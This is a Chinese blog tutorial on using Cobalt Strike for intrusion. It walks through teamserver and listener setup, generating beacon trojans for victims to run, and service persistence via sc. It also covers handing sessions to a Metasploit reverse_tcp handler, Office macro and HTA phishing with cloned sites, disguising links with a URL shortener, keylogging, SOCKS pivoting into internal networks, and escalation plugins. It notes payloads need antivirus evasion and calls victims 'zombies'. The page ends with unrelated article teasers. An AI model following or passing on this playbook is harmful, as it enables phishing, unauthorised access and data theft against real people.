cs工具使用

CobaltStrike是一款美国RedTeam开发的渗透测试神器,常被业界人称为CS。最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,CobaltStrike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。

CobaltStrike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上。当然你知道利用这款工具主要用于内网渗透以及APT攻击。

项目官网:https://www.cobaltstrike.com

实验环境:

服务器端(Linux):192.168.0.109靶机(windows):192.168.19.130

使用cobaltstrike 3.14

实验步骤

将工具上传到kali系统中运行时给777权限

root@kali:/mnt/cobaltstrike# chmod 777

/mnt/cobaltstrike/

一、启动,连接服务器

启动服务端:(test 为待会靶机连接服务器的密码)./teamserver 192.168.19.146 test

Test为密码hash密码要与客户端一样诺不一样则此软件存在后面

客户端连接服务器运行:cobalstrike.bat

启动客户端,输入ip,密码,端口,用户默认

如果客户端 是Linux操作系统则运行以下命令,启动客户端:java -Dfile.encoding=UTF-8

-javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap

-XX:+UseParallelGC -jar cobaltstrike.jar

创建监听器。4.0一、创建监听器

1、点击 Cobalt Strike ->

Listeners->Add,其中内置了八个Payload,

wndows/beacon_dns/reverse_dns_txt

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https

windows/beacon_bind_pipe

windows/beacon_tcp

windows/beacon_extc2

windows/foreign/reverse_http

windows/foreign/reverse_https

生成木马创建payload 让主机上线

运行该exe主机成功上线:可以查看上线主机的磁盘信息,进行端口扫描,查看进程等信息。

同理如果将生成的artifact.exe作为附件发送给其他人,只要有人点击,则他的机器会上线。不过现在的电脑都装了杀毒软件,所以payload需做免杀。这个后续在研发

HttpsPayload应用

优点:可能过行为查杀、另外administrator运行可直接提升为system权限

第一步

Windows Service需要向操作系统注册EXE直接运行  

第二步:创建服务

Sc create test binpath= ”c:\test.exe”      //创建的服务名,binPath后面是运行exe文件的所在路径    创建一个路径一般放在C:\Windows\System32下因为这个路径执行文件最多

start= auto displayname= ”test”          //将exe注册为windows服务 displayname服务器名称

Sc start test                    //开启这个服务

Sc delete test                   //删除这个服务

Sc top test                       //首先使用这个服务 

sc配置服务

有以下集中方式:

sc config 服务名 start= AUTO    (自动)

sc config 服务名 start= DEMAND  (手动)

sc config 服务名 start= DISABLED(禁用)


三、关于SC

可参考一个网友的博文---SC命令管理服务状态:http://blog.csdn.net/ddjj_1980/article/details/7493045



1、结合metasploit,反弹shell

1. MSF中use exploit/multi/handler,然后set payload windows/meterpreter/reverse_tcp、set lhost、set lport;然后CS中新建监听器;一个test社工肉鸡运行,然后新建监听器reverse_tcp派生会话,run:


新建两个监听器一个放木马上线

在靶机中使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。

选中刚刚新建msf





session -i查看会话然后session -i 1进入

派生给reverse_tcp然后Exploit

2、office宏钓鱼

攻击→后门→MS office 然后复制恶意代码→插入office的宏中,社工肉鸡打开即可

 MSF中use exploit/multi/handler,然后set payload windows/meterpreter/reverse_tcp、set lhost、set lport;然后CS中新建监听器;一个test社工肉鸡运行,然后新建监听器reverse_tcp派生会话,run:或使用另一个监听器可以直接在图形化界面使用

或使用另一个监听器可以直接在图形化界面使用

下载运行则中招

Cs 生成的代码直接放到创建里面去,注意:做试验的时候,宏的位置不要设置所有的活动模板和文档,建设应用在当前文档,不然本机所有word文档运行都会种上你的木马,另外打开word文档有宏提示,一般是word默认禁用所有宏(文件—选项—信任中心—信任中心设置里面配置)。

3、hta网页挂马

第一步:生成hta



第二步:使用文件下载




点击开始之后,evil.hta文件会自动传到cs uploads目录。




如果之前设置过钓鱼页面,记得一定要删掉,不然会克隆的时候会报错


总结:

1. 先制作HTML:http://192.168.1.184:80/test.hta

2. 钓鱼攻击→文件下载:http://192.168.1.184:80/download/file.ext

3. 钓鱼攻击→克隆网站:http://192.168.1.184:80/

4. 社工肉鸡打开:

键盘记录

4、邮件钓鱼

1. 邮件钓鱼:

附件下载后运行

5. 信息收集

制作好钓鱼页面:可以使用https://bitly.com制作短网址,然后让对方打开:

然后设置好跳转的网址

以通过https://bitly.com生成url短链接 ()   

6. socks代理:

win7双网卡:内网:172.16.2.1    

win2003:172.16.2.2

win7双网卡

2003内网:172.16.2.1

MSF中:setg Proxies socks4:192.168.1.184:40520;use auxiliary/scanner/smb/smb_version;然后set rhosts 172.16.2.2;run

setg Proxiessocks4:192.168.0.106:6677

也可以使用下面方法:

开启socks4a代理,通过代理进行内网渗透

开启socks,可以通过命令,也可以通过右键Pivoting->SOCKS Server


beacon> socks2222

[+] startedSOCKS4a server on: 2222

[+] host calledhome, sent: 16 bytes

然后vim

/etc/proxychains.conf ,在文件末尾添加socks4代理服务器

使用proxychains代理扫描内网主机  proxychains nmap -sP192.168.183.0/24


小结:

1. CS可以创建多个客户端,操作方便

2. 功能扩展比较多,如:payload可以多种语言。

3. 支持宏的办公软件都可以(office/WPS)

4. 默认宏安全性高/非常安全,运行宏时会提示;中低不会提示,打开world有提示,说明宏很有可能有木马。


cs提权

你以什么权限运行的木马,那么木马将拥有此权限,如果权限过低我们只能进行提权。

提权插件下载https://github.com/rsmudge/Elevatekit

http://k8gege.org/Download/

https://github.com/k8gege/Aggressor


选择脚本管理器将下载好的插件放入进去不要有中午目录



内网渗透插件加使用方法

https://github.com/k8gege/Aggressor

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,332评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,508评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,812评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,607评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,728评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,919评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,071评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,802评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,256评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,576评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,712评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,389评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,032评论 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,798评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,026评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,473评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,606评论 2 350

推荐阅读更多精彩内容

  • 完成伪造邮件发送试验 要想查看一个域名是否配置了SPF,可以用nslookup或者dig查看: nslookup ...
    卿酌南烛_b805阅读 2,193评论 0 1
  • 一 漏洞及漏洞发掘方法 漏洞,是指在硬件、软件、协议实现或系统安全策略上存在缺陷,攻击者能够在未授权的情况下对系统...
    kaitoulee阅读 15,182评论 0 30
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,039评论 0 5
  • 今天是12月26号星期四。今天下午放学妈妈来接我。我一回到家,妈妈就摸我的头。说还有点烧。又给我量了体温。量了38...
    5cb52a250f18阅读 123评论 0 0
  • 《不懂带人,你就自己干到死》这本书第12~31页一直在说明一个重要的内容,“如何抓住谈话的要点”,一共分为6个部分...
    古月大侠_拆书赢未来阅读 302评论 0 3